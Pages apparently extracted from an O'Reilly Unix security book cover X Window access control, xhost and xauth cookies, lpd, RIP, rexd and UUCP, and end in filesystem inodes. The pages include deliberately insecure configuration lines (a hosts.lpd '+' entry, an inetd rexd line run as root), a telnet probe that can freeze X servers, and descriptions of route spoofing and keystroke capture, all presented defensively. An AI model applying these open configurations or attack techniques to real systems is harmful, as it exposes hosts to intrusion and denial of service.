dearth<br />

black<br />

%<br />

The hosts.lpd file has the same format as the hosts.equiv file. Thus, to allow any computer on the <strong>Internet</strong> to print on your printer,<br />

you could use the following entry:<br />

% cat /etc/hosts.lpd<br />

+<br />

%<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (22 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

We do not recommend that you do this, however!<br />

17.3.19 Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

The RIP routing protocol is used by <strong>Internet</strong> gateways to exchange information about new networks and gateways. It is<br />

implemented on many <strong>UNIX</strong> systems by the routed daemon. An alternative daemon called gated offers more control over which<br />

routing information is accepted and distributed.<br />

The routed daemon is quite a trusting program: it will happily receive (and believe) a packet from another computer on the<br />

network that says, in effect, "I am the best gateway to get anywhere; send all of your packets to me." Clearly, this trust presents<br />

even inexperienced attackers with a simple way for confounding your network. Even worse: it gives sophisticated attackers a way<br />

to eavesdrop on all of your communications.<br />

For these reasons, many sites no longer run the routed daemon. Instead, they use static routes. For most network configurations,<br />

static routing is all that is really needed: if there is only one gateway out of the local network, all traffic should be routed to it.<br />

17.3.20 UUCP over TCP (TCP Port 540)<br />

The main use for sending UUCP data over TCP connections is that some UUCP systems can transmit Usenet news more<br />

efficiently than the more modern NNTP.<br />

UUCP over TCP presents a security risk, as UUCP passwords are sent unencrypted. Furthermore, if you use news to transfer<br />

confidential information between corporate sites, that information may be monitored by other sites situated between the two<br />

endpoints.<br />

17.3.21 The X Window System (TCP Ports 6000-6063)<br />

X is a popular network-based window system that allows many programs to share a single graphical display. X-based programs<br />

display their output in windows, which can be either on the same computer on which the program is running or on any other<br />

computer on the network.<br />

Each graphical device that runs X is controlled by a special program, called the X Window Server. Other programs, called X<br />

clients, connect to the X Window Server over the network and tell it what to display. Two popular X clients are xterm (the X<br />

terminal emulator) and xclock (which displays an analog or digital clock on the screen).<br />

17.3.21.1 /etc/fbtab and /etc/logindevperm<br />

Multiuser workstations provide a challenge for X security. On early implementations of X, the logical devices for the keyboard,<br />

screen, and sound devices were world readable and world writable; this availability caused security problems, because it meant<br />

that anybody could read the contents of the user's screen or keyboard, or could listen to the microphone in his office.<br />

Some versions of <strong>UNIX</strong> have a special file that is used to solve this problem. The file, which is called /etc/fbtab under SunOS and<br />

/etc/logindevperm under Solaris (for example), specifies a list of devices that should have their owner changed to the account that<br />

has logged into the <strong>UNIX</strong> workstation. This approach is similar to the way that the /bin/login changes the ownership of tty devices<br />

to the person who has logged into a serial device.<br />

Here is a portion of the Solaris /etc/logindevperm file. Under Solaris, the file is read by the /bin/ttymon program. When a person<br />

logs onto the device that is listed in the first field, the program sets the device listed in the third field to the UID of the user that<br />

has logged in. The mode of the device is set to the value contained in the second field:<br />

/dev/console 0600 /dev/mouse:/dev/kbd<br />

/dev/console 0600 /dev/sound/* # audio devices<br />

/dev/console 0600 /dev/fbs/* # frame buffers<br />

/dev/console 0600 /dev/rtvc0 # nachos capture device 0<br />

/dev/console 0400 /dev/rtvcctl0 # nachos control device 0<br />

17.3.21.2 X security<br />

The X Window System has a simple security model - all or nothing. The X security mechanisms are used to determine whether or<br />

not a client can connect to the X Window Server. After a client successfully connects, that client can exercise complete control<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (23 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

over the display.<br />

X clients can take over the mouse or the keyboard, send keystrokes to other applications, or even kill the windows associated with<br />

other clients. This capability allows considerable flexibility in the creation of new clients. Unfortunately, it also creates a rich<br />

opportunity for Trojan horse programs: the multi-user tank war game that you are running in a corner of your screen may actually<br />

be covertly monitoring all of the email messages that you type on your keyboard, or may be making a copy of every password that<br />

you type.<br />

The simplest way for an X client program to monitor your keystrokes is to overlay the entire screen with a transparent, invisible<br />

window. Such a program records keystrokes, saves them for later use, and forwards the event to the appropriate subwindows so<br />

that the user can't tell that he or she is being monitored. Releases of the X Window System later than X11R4 have a "secure"<br />

feature on the xterm command that grabs the input from the keyboard and mouse in such a way that no transparent overlay can<br />

intercept the input. The xterm window changes color to show that this is in effect. The option is usually on a pop-up menu that is<br />

selected by holding down both the control key and the left mouse button. This is a partial fix, but it is not complete.<br />

Rather than develop a system that uses access control lists and multiple levels of privilege, the designers of the X Window System<br />

have merely worked to refine the all-or-nothing access control. X Version 11, Release 6 has five different mechanisms for<br />

implementing access control. They are listed in Table 17.3.<br />

17.3.21.3 The xhost facility<br />

X maintains a host access control list of all hosts that are allowed to access the X server. The host list is maintained via the xhost<br />

command. The host list is always active, no matter what other forms of authentication are used. Thus, you should fully understand<br />

the xhost facility and the potential problems that it can create.<br />

The xhost command lets users view and change the current list of "xhosted" hosts. Typing xhost by itself displays a list of the<br />

current hosts that may connect to your X Window Server.<br />

% xhost<br />

prose.cambridge.ma.us<br />

next.cambridge.ma.us<br />

%<br />

System Technique<br />

Table 17.3: X Access Control Systems<br />

Advantages Disadvantages<br />

xhost User specifies the hosts from Simple to use and understand. Not suited to environments in<br />

which client connections are<br />

which workstations or servers<br />

allowed; all others are rejected.<br />

are used by more than one<br />

person at a time. Server is<br />

susceptible to IP spoofing.<br />

MIT-MAGIC-COOKIE-1 Xdm or user creates a 128-bit Access to the user's display is Cookies are transmitted over<br />

"cookie" that is stored in the user's limited to processes that have the network without<br />

.Xauthority file at login. Each access to the user's .Xauthority encryption, allowing them to<br />

client program reads the cookie file.<br />

be intercepted. Cookies are<br />

from the .Xauthority file and<br />

stored in the user's .Xauthority<br />

passes it to the server when the<br />

connection is established.<br />

file, making it a target.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (24 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

XDM-AUTHORIZATION-1 Xdm creates a 56-bit DES key and X authenticator is not<br />

a 64-bit random "authenticator" susceptible to network<br />

that are stored in the user's eavesdropping.<br />

.Xauthority file. Each client uses<br />

the DES key to encrypt a 192-bit<br />

packet that is sent to the X server<br />

to validate the connection.<br />

SUN-DES-1 Authentication based on Sun's<br />

<strong>Sec</strong>ure RPC. Uses the xhost<br />

command as its interface.<br />

Communication to the X server<br />

is encrypted with the X server's<br />

public key; the secret key is not<br />

stored in the .Xauthority file,<br />

removing it as a target.<br />

MIT-KERBEROS-5 Xdm obtains Kerberos tickets Extends the Kerberos<br />

when the user logs in; these tickets network-based authentication<br />

are stored in a special credentials system to the X Window<br />

cache file that is pointed to by the<br />

KRB5CCNAME environment<br />

variable.<br />

System.<br />

The authenticator is stored in<br />

the .Xauthority file, making it a<br />

target. If the user's home<br />

directory is mounted using<br />

NFS or another network<br />

filesystem, the 56-bit DES can<br />

be eavesdropped from the<br />

network when it is read by the<br />

X client program. This<br />

authorization system uses<br />

strong encryption and is<br />

therefore not exportable.<br />

Only runs on systems that have<br />

Sun Microsystem's <strong>Sec</strong>ure<br />

RPC (mostly Solaris). This<br />

authorization system uses<br />

strong encryption and is<br />

therefore not exportable.<br />

Credentials file is a target.<br />

Stolen tickets can be used after<br />

the user logs out. Kerberos can<br />

be a challenge to install.<br />

You can add a host to the xhost list by supplying a plus sign, followed by the host's name on the command line after the xhost<br />

command. You can remove a host from the xhost list by supplying its name preceded by a hyphen:<br />

% xhost +idr.cambridge.ma.us<br />

idr.cambridge.ma.us being added to access control list<br />

% xhost<br />

next.cambridge.ma.us<br />

prose.cambridge.ma.us<br />

idr.cambridge.ma.us<br />

% xhost -next.cambridge.ma.us<br />

next.cambridge.ma.us being removed from access control list<br />

% xhost<br />

prose.cambridge.ma.us<br />

idr.cambridge.ma.us<br />

If you xhost a computer, any user on that computer can connect to your X Server and issue commands. If a client connects to your<br />

X Window Server, removing that host from your xhost list will not terminate the connection. The change will simply prevent<br />

future access from that host.<br />

If you are using SUN-DES-1 authentication, you can use the xhost command to specify the network principals (users) who are<br />

allowed to connect to your X server. The xhost command distinguishes principals from usernames because principals contain an at<br />

sign (@). For example, to allow the network principal debby@oreilly to access your server, you could type:<br />

prose% xhost debby@oreilly<br />

If you are using MIT-KERBEROS-5 authentication, you can use the xhost command to specify the Kerberos users who are<br />

allowed to connect to your server. Kerberos usernames must be preceded by the string krb5:. For example, if you wished to allow<br />

the Kerberos user alice to access your server, you would use the command:<br />

prose% xhost krb5:alice<br />

The file /etc/X0.hosts contains a default list of xhost hosts for X display 0. This file contains a list of lines that determine the<br />

default host access to the X display. The format is the same as the xhost command: if a hostname appears by itself or is preceded<br />

by a plus sign, that host is allowed. If a hostname appears preceded by a minus sign, that host is denied. If a plus sign appears on a<br />

line by itself, access control is disabled.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (25 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

For example, this file allows default access to X display 0 for the hosts oreo and nutterbutter:<br />

% cat /etc/X0.hosts<br />

-<br />

+oreo<br />

+nutterbutter<br />

If you have more than one display, you can create files /etc/X1.hosts, /etc/X2.hosts, and so forth.<br />

17.3.21.4 Using Xauthority magic cookies<br />

Normally, the Xauthority facility is automatically invoked when you use the xdm terminal management system. However, you can<br />

also enable it manually if you start the X server yourself.<br />

To start, you should preload your .Xauthority file with an appropriate key for your display. If you have the Kerberos or Sun <strong>Sec</strong>ure<br />

RPC mechanisms available, you should use those. Otherwise, you need to create a "magic cookie" for your current session. This<br />

cookie should be a random value that is not predictable to an attacker. (The script given in "A Good Random Seed Generator" in<br />

Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs can be used for this.) You should generate your "cookie" and store it in<br />

your .Xauthority file (normally, $HOME/.Xauthority):<br />

$ typeset -RZ28 key=$(randbits -n 14)<br />

$ EXPORT XAUTHORITY=${XAUTHORITY:=$HOME/.Xauthority}<br />

$ umask 077<br />

$ rm -f $XAUTHORITY<br />

$ cp /dev/null $XAUTHORITY<br />

$ chmod 600 $XAUTHORITY<br />

$ xauth add $HOSTNAME:$displ . $key<br />

$ xauth add $HOSTNAME/unix:$displ . $key<br />

$ xauth add localhost:$displ . $key<br />

$ unset key<br />

Next, when you start your X server, do so with the -auth option:<br />

$ xinit -- -auth $XAUTHORITY<br />

All your local client programs will now consult the .Xauthority file to identify the correct "magic cookie" and then send it to the<br />

server. If you want to run a program from another machine to display on this one, you will need to export the "cookies" to the<br />

other machine. If your home directory is exported with NFS, the file should already be available - you simply need to set the<br />

XAUTHORITY environment variable to the pathname of the .Xauthority file (or whatever else you've named it).<br />

Otherwise, you can do something similar to:<br />

$ xauth extract - $DISPLAY | rsh otherhost xauth merge -<br />

Keep in mind that the "magic cookies" in this scheme can be read from your account or found by anyone reading network packets.<br />

However, this method is considerably safer than using the xhosts mechanism, and should be used in preference to xhosts when<br />

feasible.<br />

NOTE: Versions of X11R6 xdm prior to public patch 13 contain a weakness in the xauth generation method, which<br />

allows an intruder to access its display. For details, see "CERT advisory VB-95:08.X_Authentication_Vul."<br />

17.3.21.5 Denial of service attacks under X<br />

Even if you use the xhost facility, your X Window System may be vulnerable to attack from computers that are not in your xhost<br />

list. Some X window servers read a small packet from the client before they determine whether or not the client is in the xhost list.<br />

If a client connects to the X server but does not transmit this initial packet, the X server halts all operation until it times out in 30<br />

seconds.<br />

You can determine whether your X server has this problem by executing the following command:<br />

prose% telnet localhost 6000<br />

Here, 6000 is the TCP/IP port address of the first X server on the system. (The second X display on the system has a TCP/IP<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (26 of 28) [2002-04-12 10:44:13]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

address of 6001.)<br />

If your X server has this problem, your workstation's display will freeze. The cursor will not move, and you will be unable to type<br />

anything. In some X implementations, the X server will time out after 30 seconds and resume normal operations. Under other X<br />

implementations, the server will remain blocked until the connection is aborted.<br />

Although this attack cannot be used to destroy information, it can be used to incapacitate any workstation that runs one of these<br />

servers and is connected to the network. If you have this problem with your software, ask your vendor for a corrected update.<br />

17.3.22 RPC rpc.rexd (TCP Port 512)<br />

The rpc.rexd is a Sun RPC server that allows for remote program execution. Using rpc.rexd, any user who can execute RPC<br />

commands on your machine can run arbitrary shell commands.<br />

The rpc.rexd daemon is usually started from the /etc/inetd.conf file with the following line:<br />

# We are being stupid and running the rexd server without <strong>Sec</strong>ure RPC:<br />

#<br />

rexd/1 tli rpc/tcp wait root /usr/sbin/rpc.rexd rpc.rexd<br />

As the comment indicates, you should not run the rexd server. We make this warning because running rexd without secure RPC<br />

basically leaves your computer wide open, which is why Sun distributes their /etc/inetd.conf file with rexd commented out:<br />

# The rexd server provides only minimal<br />

# authentication and is often not run<br />

#<br />

#rexd/1 tli rpc/tcp wait root /usr/sbin/rpc.rexd rpc.rexd<br />

We think that vendors should remove the rexd line from the /etc/inetd.conf file altogether.<br />

17.3.23 Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

Multi-User Dungeons (MUDS) are role-playing games that allow many people over a network to interact in the same virtual<br />

environment. Most MUDS are recreational, although some MUDS have been created to allow scientists and other professionals to<br />

interact. (The MIT Media Lab's MediaMOO is an example of such a virtual environment.)<br />

<strong>Internet</strong> Relay Chat (IRC) is the Citizen's Band radio of the <strong>Internet</strong>. IRC permits real-time communication between many<br />

different people on different computers. Messages can be automatically forwarded from system to system.<br />

While both MUDS and IRC can be useful and entertaining to use, these systems can also have profound security implications:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Because these systems permit unrestricted communication between people on your computer and others on the <strong>Internet</strong>,<br />

they create an excellent opportunity for social engineering. Often an attacker will tell a naive user that there is some "great<br />

new feature" that they can enable simply by typing a certain command - a command that then allows the attacker to log in<br />

and take over the user's account. Unfortunately, there is no simple way to protect users from this kind of attack, other than<br />

to educate them to be suspicious of what they are told by strangers on the net.<br />

Most MUDS require users to create an account with a username and a password. Unfortunately, many users will blindly<br />

type the same username and password that they use for their <strong>UNIX</strong> account. This creates a profound security risk, as it<br />

permits anybody who has access to the MUD server (such as its administrator) to break into the user's <strong>UNIX</strong> account.<br />

Although many MUDS and IRCS can be used with Telnet, they are more fun when used with specially written client<br />

programs. Unfortunately, some of these programs have been distributed with intentional security holes and back doors.<br />

Determining whether or not a client program is equipped with this kind of "feature" is very difficult.<br />

Even if your MUD or IRC client doesn't have a built-in back door, many of these clients will execute commands from<br />

remote machines if such a feature is enabled by the user. The world of MUDS and IRCS is rife with malicious users who<br />

attempt to get unsuspecting users to enable these features.<br />

The server programs for MUDS and IRCS can place a significant load on the computers on which they reside.<br />

Unfortunately, as MUDS and IRCS do not use "trusted ports," users can run their own servers even if they don't have root<br />

access.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (27 of 28) [2002-04-12 10:44:13]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

17.2 Controlling Access to<br />

Servers<br />

17.4 <strong>Sec</strong>urity Implications of<br />

Network Services<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (28 of 28) [2002-04-12 10:44:13]


[Chapter 15] UUCP<br />

15. UUCP<br />

Contents:<br />

About UUCP<br />

Versions of UUCP<br />

UUCP and <strong>Sec</strong>urity<br />

<strong>Sec</strong>urity in Version 2 UUCP<br />

<strong>Sec</strong>urity in BNU UUCP<br />

Additional <strong>Sec</strong>urity Concerns<br />

Early <strong>Sec</strong>urity Problems with UUCP<br />

UUCP Over Networks<br />

Summary<br />

Chapter 15<br />

UUCP is the <strong>UNIX</strong>-to-<strong>UNIX</strong> Copy system, a collection of programs that have provided rudimentary networking for<br />

<strong>UNIX</strong> computers since 1977.<br />

UUCP has three main uses:<br />

●<br />

●<br />

●<br />

Sending mail and news to users on remote systems<br />

Transferring files between <strong>UNIX</strong> systems<br />

Executing commands on remote systems<br />

Until recently, UUCP was very popular in the <strong>UNIX</strong> world for a number of reasons:<br />

●<br />

●<br />

●<br />

UUCP came with almost every version of <strong>UNIX</strong>; indeed, for many users, UUCP used to be the reason to<br />

purchase a <strong>UNIX</strong> computer in the first place.<br />

UUCP required no special hardware: it runs over standard RS-232 serial cables, and over standard modems for<br />

long-distance networks.<br />

UUCP can store messages during the day and send them in a single batch at night, substantially lowering the<br />

cost of phone-based networking.<br />

The UUCP programs also allow you to connect your computer to a worldwide network of computer systems called<br />

Usenet. Usenet is a multihost electronic bulletin board with several thousand special interest groups; articles posted<br />

on one computer are automatically forwarded to all of the other computers on the network. The Usenet reaches<br />

millions of users on computer systems around the world on every continent.<br />

In recent years, interest in UUCP has declined for a number of reasons:<br />

●<br />

UUCP was designed and optimized for low-speed connections. When used with modems capable of<br />

transmitting at 14.4 Kbps or a faster rate, the protocols become increasingly inefficient.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_01.htm (1 of 5) [2002-04-12 10:44:13]


[Chapter 15] UUCP<br />

●<br />

●<br />

New network protocols such as SLIP and PPP use the same hardware as UUCP, yet allow the connecting<br />

machine to have access to the full range of <strong>Internet</strong> services.<br />

UUCP links that were used to provide access for one or a few people are being replaced with dial-up POP<br />

(Post Office Protocol) and IMAP servers, which allow much more flexibility when retrieving electronic mail<br />

over a slow connection and which are easier to administer.<br />

Thus, while UUCP is still used by a number of legacy systems, few sites are installing new UUCP systems.<br />

Nevertheless, a working knowledge of UUCP is still important for the <strong>UNIX</strong> system administrator for a number of<br />

reasons:<br />

●<br />

●<br />

●<br />

Even if you don't use UUCP, you probably have the UUCP programs on your system. If they are improperly<br />

installed, an attacker could use those programs to gain further access.[1]<br />

[1] For this reason, you may wish to remove the UUCP subsystem (or remove the SUID/SGID<br />

permissions from the various UUCP executables) if you have no intention of using it.<br />

If you are a newly hired administrator for an existing system, people could be using UUCP on your system<br />

without your knowledge.<br />

The UUCP programs are still used by many sites to exchange netnews. Thus, your computer may be using<br />

UUCP without anybody's knowledge.[2]<br />

[2] Rich Salz's <strong>Internet</strong> News system (INN) provides an excellent means for sites on the <strong>Internet</strong><br />

to exchange netnews without relying on UUCP.<br />

The Nutshell Handbook Using and Managing UUCP (<strong>O'Reilly</strong> & Associates) describes in detail how to set up and<br />

run a UUCP system, as well as how to connect to the Usenet. This chapter focuses solely on those aspects of UUCP<br />

that relate to computer security.<br />

15.1 About UUCP<br />

From the user's point of view, UUCP consists of two main programs:<br />

●<br />

●<br />

uucp, which copies files between computers<br />

uux, which executes programs on remote machines<br />

<strong>UNIX</strong>'s electronic mail system also interfaces with the UUCP system. As most people use UUCP primarily for mail,<br />

this chapter also discusses the mail and rmail commands.<br />

15.1.1 uucp Command<br />

The uucp command allows you to transfer files between two <strong>UNIX</strong> systems. The command has the form:<br />

uucp [flags] source-file destination-file<br />

UUCP filenames can be regular pathnames (such as /tmp/file1) or can have the form:<br />

system-name!pathname<br />

For example, to transfer the /tmp/file12 file from your local machine to the machine idr, you might use the command:<br />

$ uucp /tmp/file12 idr!/tmp/file12<br />

$<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_01.htm (2 of 5) [2002-04-12 10:44:13]


[Chapter 15] UUCP<br />

You can also use uucp to transfer a file between two remote computers, assuming that your computer is connected to<br />

both of the other two machines. For example, to transfer a file from prose to idr, you might use the command:<br />

$ uucp prose!/tmp/myfile idr!/u1/lance/yourfile<br />

$<br />

For security reasons, UUCP is usually configured so that files can be copied only into the /usr/spool/uucppublic<br />

directory: the UUCP public directory. Because /usr/spool/uucppublic is lengthy to type, UUCP allows you to<br />

abbreviate the entry with a tilde (~):<br />

$ uucp file12 idr!~/anotherfile<br />

$<br />

Notice that you can change the name of a file when you send it.<br />

15.1.1.1 uucp with the C shell<br />

The above examples were all typed with sh, the Bourne shell. They will not work as is with the C shell. The reason<br />

for this is the csh history feature.[3]<br />

[3] The ksh also has a history mechanism, but it does not use a special character that interferes with<br />

other programs.<br />

The C shell's history feature interprets the exclamation mark as a command to recall previously typed lines. As a<br />

result, if you are using csh and you wish to have the exclamation mark sent to the uucp program, you have to quote,<br />

or "escape," the exclamation mark with a backslash:<br />

% uucp /tmp/file12 idr\!/tmp/file12<br />

%<br />

15.1.2 uux Command<br />

The uux command enables you to execute a command on a remote system. In its simplest form, uux reads an input<br />

file from standard input to execute a command on a remote computer. The command has the form:<br />

uux - system\!command < inputfile<br />

In the days before local area networks, uux was often used to print a file from one computer on the printer of another.<br />

For sites that don't have local area networks, uux is still useful for that purpose. For example, to print the file report<br />

on the computer idr, you might use the command:<br />

$ uux - "idr!lpr" < report<br />

$<br />

The notation idr!lpr causes the lpr command to be run on the computer called idr. Standard input for the lpr<br />

command is read by the UUCP system and transferred to the machine idr before the command is run.<br />

Today, the main use of uux is to send mail and Usenet articles between machines that are not otherwise connected to<br />

LANS or the <strong>Internet</strong>.<br />

You can use the uux command to send mail "by hand" from one computer to another by running the program rmail<br />

on a remote machine:<br />

$ uux - "idr!rmail leon"<br />

Hi, Leon!<br />

How is it going?<br />

Sincerely,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_01.htm (3 of 5) [2002-04-12 10:44:13]


[Chapter 15] UUCP<br />

Mortimer<br />

^D<br />

$<br />

The hyphen (-) option to the uux command means that uux should take its input from standard input and run the<br />

command rmail leon on the machine idr. The message will be sent to the user leon.<br />

15.1.3 mail Command<br />

Because people send mail a lot, the usual <strong>UNIX</strong> mail command understands UUCP-style addressing, and<br />

automatically invokes uux when in use. [4]<br />

[4] There are many different programs that can be used to send mail. Most of them either understand<br />

UUCP addressing or give your message to another program, such as sendmail, that does.<br />

For example, you could send mail to leon on the idr machine simply by typing:<br />

$ mail idr!leon<br />

Subject: Hi, Leon!<br />

How is it going?<br />

Sincerely,<br />

Mortimer<br />

^D<br />

$<br />

When mail processes a mail address contain an exclamation mark, the program automatically invokes the uux<br />

command to cause the mail message to be transmitted to the recipient machine.<br />

15.1.4 How the UUCP Commands Work<br />

uucp, uux, and mail don't actually transmit information to the remote computer; they simply store it on the local<br />

machine in a spool file. The spool file contains the names of files to transfer to the remote computer and the names<br />

of programs to run after the transfer takes place. Spool files are normally kept in the /usr/spool/uucp directory (or a<br />

subdirectory inside this directory).<br />

If the uux command is invoked without its -r option, the uucico (<strong>UNIX</strong>-to-<strong>UNIX</strong> Copy-In-Copy-Out) program is<br />

executed immediately.[5] In many applications, such as in sending email, the -r option is provided by default, and<br />

the commands are queued until the uucp queue is run at some later time. Normally, uucico is run on a regular basis<br />

by cron. However started, when the program uucico runs it initiates a telephone call to the remote computer and<br />

sends out the spooled files. If the phone is busy or for some other reason uucico is unable to transfer the spool files,<br />

they remain in the /usr/spool/uucp directory, and uucico tries again when it is run by cron or another invocation of<br />

uux.<br />

[5] A few versions of UUCP support a -L flag to uux that acts opposite to the -r flag, and causes uucico<br />

to be started immediately.<br />

When it calls the remote computer, uucico gets the login: and password: prompts as does any other user. uucico<br />

replies with a special username and password for logging into a special account. This account, sometimes named<br />

uucp or nuucp, has another copy of the uucico program as its shell; the uucico program that sends the files operates<br />

in the Master mode, while the uucico program receiving the files operates in the Slave mode.<br />

The /etc/passwd entry for the special uucp user often looks similar to this:<br />

uucp:mdDF32KJqwerk:4:4:Mr. UUCP:/usr/spool/uucppublic:/usr/lib/uucp/uucico<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_01.htm (4 of 5) [2002-04-12 10:44:13]


[Chapter 15] UUCP<br />

After the files are transferred, a program on the remote machine named uuxqt executes the queued commands. Any<br />

errors encountered during remote command execution are captured and sent back as email to the initiating user on<br />

the first machine.<br />

14.6 Additional <strong>Sec</strong>urity for<br />

Modems<br />

15.2 Versions of UUCP<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_01.htm (5 of 5) [2002-04-12 10:44:13]


[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

Chapter 5<br />

5. The <strong>UNIX</strong> Filesystem<br />

Contents:<br />

Files<br />

Using File Permissions<br />

The umask<br />

Using Directory Permissions<br />

SUID<br />

Device Files<br />

chown: Changing a File's Owner<br />

chgrp: Changing a File's Group<br />

Oddities and Dubious Ideas<br />

Summary<br />

The <strong>UNIX</strong> filesystem controls the way that information in files and directories is stored on disk and other forms of<br />

secondary storage. It controls which users can access what items and how. The filesystem is therefore one of the most<br />

basic tools for enforcing <strong>UNIX</strong> security on your system.<br />

Information stored in the <strong>UNIX</strong> filesystem is arranged as a tree structure of directories and files. The tree is<br />

constructed from directories and subdirectories within a single directory, which is called the root. [1] Each directory,<br />

in turn, can contain other directories or entries such as files, pointers (symbolic links) to other parts of the filesystem,<br />

logical names that represent devices (such as /dev/tty), and many other types.[2]<br />

[1] This is where the "root" user (superuser) name originates: the owner of the root of the filesystem.<br />

[2] For example, the <strong>UNIX</strong> "process" filesystem in System V contains entries that represent processes<br />

that are currently executing.<br />

This chapter explains, from the user's point of view, how the filesystem represents and protects information.<br />

5.1 Files<br />

From the simplest perspective, everything visible to the user in a <strong>UNIX</strong> system can be represented as a "file" in the<br />

filesystem - including processes and network connections. Almost all of these items are represented as "files" each<br />

having at least one name, an owner, access rights, and other attributes. This information is actually stored in the<br />

filesystem in an inode(index node), the basic filesystem entry. An inode stores everything about a filesystem entry<br />

except its name; the names are stored in directories and are associated with pointers to inodes.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (1 of 8) [2002-04-12 10:44:14]


[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

5.1.1 Directories<br />

One special kind of entry in the filesystem is the directory. A directory is nothing more than a simple list of names and<br />

inode numbers. A name can consist of any string of any characters with the exception of a "/" character and the "null"<br />

character (usually a zero byte).[3] There is a limit to the length of these strings, but it is usually quite long: 1024 or<br />

longer on many modern versions of <strong>UNIX</strong>; older AT&T versions limit names to 14 characters or less.<br />

[3] Some versions of <strong>UNIX</strong> may further restrict the characters that can be used in filenames and directory<br />

names.<br />

These strings are the names of files, directories, and the other objects stored in the filesystem. Each name can contain<br />

control characters, line feeds, and other characters. This can have some interesting implications for security, and we'll<br />

discuss those later in this and other chapters.<br />

Associated with each name is a numeric pointer that is actually an index on disk for an inode. An inode contains<br />

information about an individual entry in the filesystem; these contents are described in the next section.<br />

Nothing else is contained in the directory other than names and inode numbers. No protection information is stored<br />

there, nor owner names, nor data. The directory is a very simple relational database that maps names to inode<br />

numbers. No restriction on how many names can point to the same inode exists, either. A directory may have 2, 5, or<br />

50 names that each have the same inode number. In like manner, several directories may have names that associate to<br />

the same inode. These are known as links [4] to the file. There is no way of telling which link was the first created, nor<br />

is there any reason to know: all the names are equal in what they access. This is often a confusing idea for beginning<br />

users as they try to understand the "real name" for a file.<br />

[4] These are hard links or direct links. Some systems support a different form of pointer, known as a<br />

symbolic link, that behaves in a different way.<br />

This also means that you don't actually delete a file with commands such as rm. Instead, you unlink the name - you<br />

sever the connection between the filename in a directory and the inode number. If another link still exists, the file will<br />

continue to exist on disk. After the last link is removed, and the file is closed, the kernel will reclaim the storage<br />

because there is no longer a method for a user to access it.<br />

Every normal directory has two names always present. One entry is for "." (dot), and this is associated with the inode<br />

for the directory itself; it is self-referential. The second entry is for ".." (dot-dot), which points to the "parent" of this<br />

directory - the directory next closest to the root in the tree-structured filesystem. The exception is the root directory<br />

itself, named "/". In the root directory, ".." is also a link to "/".<br />

5.1.2 Inodes<br />

For each object in the filesystem, <strong>UNIX</strong> stores administrative information in a structure known as an inode. Inodes<br />

reside on disk and do not have names. Instead, they have indices (numbers) indicating their positions in the array of<br />

inodes.<br />

Each inode generally contains:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

The location of the item's contents on the disk, if any<br />

The item's type (e.g., file, directory, symbolic link)<br />

The item's size, in bytes, if applicable<br />

The time the file's inode was last modified (the ctime)<br />

The time the file's contents were last modified (the mtime)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_01.htm (2 of 8) [2002-04-12 10:44:14]


[Chapter 5] The <strong>UNIX</strong> Filesystem<br />

●<br />

●<br />

●<br />

●<br />

●<br />

The time the file was last accessed (the atime) for read ( ), exec ( ), etc<br />

A reference count: the number of names the file has<br />

The file's owner (a UID)<br />

The file's group (a GID)<br />

The file's mode bits (also called file permissions or permission bits)<br />

The last three pieces of information, stored for each item, and coupled with UID/GID information about executing<br />

processes, are the fundamental data that <strong>UNIX</strong> uses for practically all operating system security.<br />

Other information can also be stored in the inode, depending on the particular version of <strong>UNIX</strong> involved. Some<br />

systems may also have other nodes such as vnodes, cnodes, and so on. These are simply extensions to the inode<br />

concept to support foreign files, RAID[5] disks, or other special kinds of filesystems. We'll confine our discussion to<br />

inodes, as that abstraction contains most of the information we need.<br />

[5] RAID means Redundant Array of Inexpensive Disks. It is a technique for combining many low-cost<br />

hard disks into a single unit that offers improved performance and reliability.<br />

Figure 5.1 shows how information is stored in an inode.<br />

Figure 5.1: Files and inodes<br />

5.1.3 Current Directory and Paths<br />

Every item in the filesystem with a name can be specified with a pathname. The word pathname is appropriate<br />

